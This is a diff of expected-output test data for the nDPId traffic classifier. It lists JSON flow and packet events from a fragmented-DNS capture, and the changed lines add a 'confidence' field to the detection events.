 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1558968010233,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":120,"pkt_l4_len":66,"ts_msec":1558968010233,"pkt":"AAwpil3XAIac51UUht1gArj8AEIRayoAFFBAEwwDAAAAAAAAAQogAQRwdlsAAAAAAAAKJQBTtWEANQBC7JLpxAAQAAEAAAAAAAECcGEId2ViZXJsYWICZGUAABwAAQAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 02413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1558968010234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9BbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAAAShAPAsANbVhBeUUjunEhBAAAQACAAMACQJwYQh3ZWJlcmxhYgJkZQAAHAABwAwAHAABAAAAPAAQIAEEcB8LECQAAAAAAAAAAsAMAC4AAQAAADwBHwAcCgMAAAA8XQZZ\/FzevuyQRwh3ZWJlcmxhYgJkZQC1pnXN9aJB47xcEl0t+RyJPr\/p+1OSRyBEPleyPVcVG13SY1au\/jvJTdnRA4lySA7r3bi4LlJCEattffR4fjevK4f+NrGd0s5mJ+PRg85+C1QnHQmbvL9v+MI2zPL2z8n5PSX3Yf1y4VNvPCJ7YmzWzkyABQys7VcUh58r0Vf2MDfcX+p\/oqdfN5wH3piEMrifXVk3S1jvEgqm3k\/0jIc5bfsXYFPDiziLSsKruSCkr5Ydv6DPypeAQh8lSdezjVxYVAOnbrtC88Q7QQ04+1dWXmZGW9cG+PBKFrFDsPDKsCvsJ0ggc3+bJXpyZZ0SaqfH4Zgi8NjO\/iMCsrSxLkS9wFoAAgABAAAAPAAPA25zMgh3ZWJlcmRuc8BjwFoAAgABAAAAPAAGA25zMcF3wFoALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbir6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBjgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwXMAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8GOAAEAAQAADhAABMEY4+7BcwABAAEAAA4QAATC9wUOwY4ALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwY4ALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywXMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wXMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SQ=="}
-00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1558968010234,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
+00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1558968010234,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
 00450{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":123,"pkt_l4_len":0,"ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9AEUsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAFqChAPAtderZqHOphjXllMk8sHswGkSaaDoR\/AL9bqSnISQXKcnns5gAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"}
 00192{"basic_event_id":12,"basic_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":89}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1558968018074,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"ts_msec":1558968018074,"pkt":"AAwpil3XAIac51UUht1gCQGuAEMRayoAFFBAEwwGAAAAAAAAAQUgAQRwdlsAAAAAAAAKJQBT94kANQBDODsKMgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAABAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1558968018075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVBbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAAASR\/DLMANfeJBdraSAoyhBAAAQACAAMACQNmZzIId2ViZXJsYWICZGUAAAEAAcAMAAEAAQAAADwABML3BArADAAuAAEAAAA8AR8AAQoDAAAAPF0J+51c4m0NkEcId2ViZXJsYWICZGUATmqKLyXYlD7oC1wjnJdPzxr55pJoGn6h+biEYxUlvjgkAKYGVr2OkUzNi9dPZZCT1\/wXWro5BadVhTNlYhGA9J99DHUUB5NEITFfyeoCqRwORKOIN8F3N4260XT5uRwPgDtpnX9J6IRQN3Hg639ASVUfreGkxN2At0j1oxD21UcoFDfwz5Fn7owm5vE3RP6EyTqHCPkRSCJvvZO+Lb6nyRwRS\/BgbrTAjIDB9gxMtXs7GIKlm\/T21iqqa\/CM0K3y9nYSv2Mbgyh+nhDaTp4WmMKZfRzP6DKGL+Myx7893ekGgWnaQNeZGzB3BTQVSEJFLULyYavsqtvSpVIspLF1IcBPAAIAAQAAADwADwNuczIId2ViZXJkbnPAWMBPAAIAAQAAADwABgNuczHBbMBPAC4AAQAAADwBHwACCgIAAAA8XQoA7FzibzWQRwh3ZWJlcmxhYgJkZQB0qMTaqgCspuIcPYiPf3BgfQDsq4tYGfT0QlWt5KJKITRcMICWR4fxmCxHuWlUNejQz2mbGhAzRSlcwKsiD4U6Q+uopuCYgHSJmt\/s0OjDPfudF4BOMw9+KVz84hDd\/4acsdDrEWjA3YvnyyflUhRrCvnRH+6JQJU80RMEvIAITMW4q+myuRsjD9B6QfjeeqqCUKrx5bwtdTeB0NT4gHxxjP3tHJ6Ez+B7TaCbOM5TtNYqTFI7mdspd2h6snRoEpvY7MK1Z3onr5DenD\/f6LB53lBHt6avjWu+uwwUOhqLcoi9In2I6kbfraddRWYM\/kcIQiOffZOZsRUnnKHK\/NLMwYMAHAABAAAOEAAQIAEEcHZbAAAAAAAACiUAU8FoABwAAQAADhAAECABBHAfCxawAAAAAAomAFPBgwABAAEAAA4QAATBGOPuwWgAAQABAAAOEAAEwvcFDsGDAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQCxSs6jI4fQc085O7XtX7BRqKJPIVj7R9A4dqni5pD4gtNCWOOQ49jwEV7+OJGrV9+bQHl4OIsfEGbPnNRiHD2rU2g12XuiewoGY6BET\/nnDTpid7zS7Y\/LN1BquV9W+umqOKnWTehPA142KT1sXmg\/uimXe8rUIwZkTczjR1eAjcGDAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQBBD7f476TWGU2sVH\/4at2erVKbOlwQPWLt9uQcMty7pDI7Tp7ZMWePK7xTYo+\/SKKtxGxsQm+Dw9BFS7QOZSkelOvY2K3W7IddWoZiKuHNL6ASQClSZKX4qKmE15GQqaQ+Q1hJxXO\/t3ZgmbUep+3HS0TBl3lNHnu26Kn\/p7RtMsFoAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQAHW3hBW4NpYOIt651fuskLdlXmIsxpk\/6w7e6123vRr4NG7O3Asyr4d5yzXO5X5MN06Mbt4dpvzarwCTZMS0Zq7X8cOvHMsuJZB4S9jSy92NfY76dqptuZmVYMHCcpQfQ5b5NEXqoHoi\/BNRsimfm2CW+D1vl+OXsGia3WBYBr+MFoAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQC2O9UUXwYnbNfGDKn296Q1feb4wr\/YEE8HV4OyiM\/YXI7FguC3V+KwiuEYnLO8UOUGgTTg1STXeWpc9EeYTA3q8WxKc1b6IIDbOhMAmEXs3UqT+QtwyRceovPAtklderZqHOphjXllMg=="}
-00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1558968018075,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}}
+00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1558968018075,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}}
 00439{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":112,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":112,"pkt_l4_len":0,"ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVADosQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAFqCR\/DLNPLB7MBpEmmg6EfwC\/W6kpyEkFynJ57OYAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
 00192{"basic_event_id":12,"basic_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":78}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1558968019069,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1558968019069,"pkt":"AAwpil3XAIac51UUCABFAABXnz0AAGwRsyatwqlowRjj7uhIADUAQ+SwoX0AEAABAAAAAAABA2ZnMgh3ZWJlcmxhYgJkZQAAAQABAAApEAAAAIAAAA8ACAALAAI4ACABBHAfCxY="}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1558968019069,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAXc4hEgAEARds3BGOPurcKpaAA16EgF2oW\/oX2EEAABAAIAAwAJA2ZnMgh3ZWJlcmxhYgJkZQAAAQABwAwAAQABAAAAPAAEwvcECsAMAC4AAQAAADwBHwABCgMAAAA8XQn7nVzibQ2QRwh3ZWJlcmxhYgJkZQBOaoovJdiUPugLXCOcl0\/PGvnmkmgafqH5uIRjFSW+OCQApgZWvY6RTM2L109lkJPX\/BdaujkFp1WFM2ViEYD0n30MdRQHk0QhMV\/J6gKpHA5Eo4g3wXc3jbrRdPm5HA+AO2mdf0nohFA3ceDrf0BJVR+t4aTE3YC3SPWjEPbVRygUN\/DPkWfujCbm8TdE\/oTJOocI+RFIIm+9k74tvqfJHBFL8GButMCMgMH2DEy1ezsYgqWb9PbWKqpr8IzQrfL2dhK\/YxuDKH6eENpOnhaYwpl9HM\/oMoYv4zLHvz3d6QaBadpA15kbMHcFNBVIQkUtQvJhq+yq29KlUiyksXUhwE8AAgABAAAAPAAPA25zMQh3ZWJlcmRuc8BYwE8AAgABAAAAPAAGA25zMsFswE8ALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbir6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBaAABAAEAAA4QAATBGOPuwYMAAQABAAAOEAAEwvcFDsFoABwAAQAADhAAECABBHB2WwAAAAAAAAolAFPBgwAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTwWgALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwWgALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywYMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wYMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SV16tmoc6mGNeWUyTywezAaRJpoOhH8Av1upKchJBcpyeezmAAApEAAAAIA="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}}
 00355{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAAm4hEAuUARm8rBGOPurcKpaAAADwAIAAsAAjgAIAEEcB8LFg=="}
 00192{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":18}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1558968021013,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"ts_msec":1558968021013,"pkt":"AAwpil3XAIac51UUht1gBi\/8AEMRayoAFFBADAwAAAAAAAAAAQYgAQRwdlsAAAAAAAAKJQBT1J4ANQBDpiukOAAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
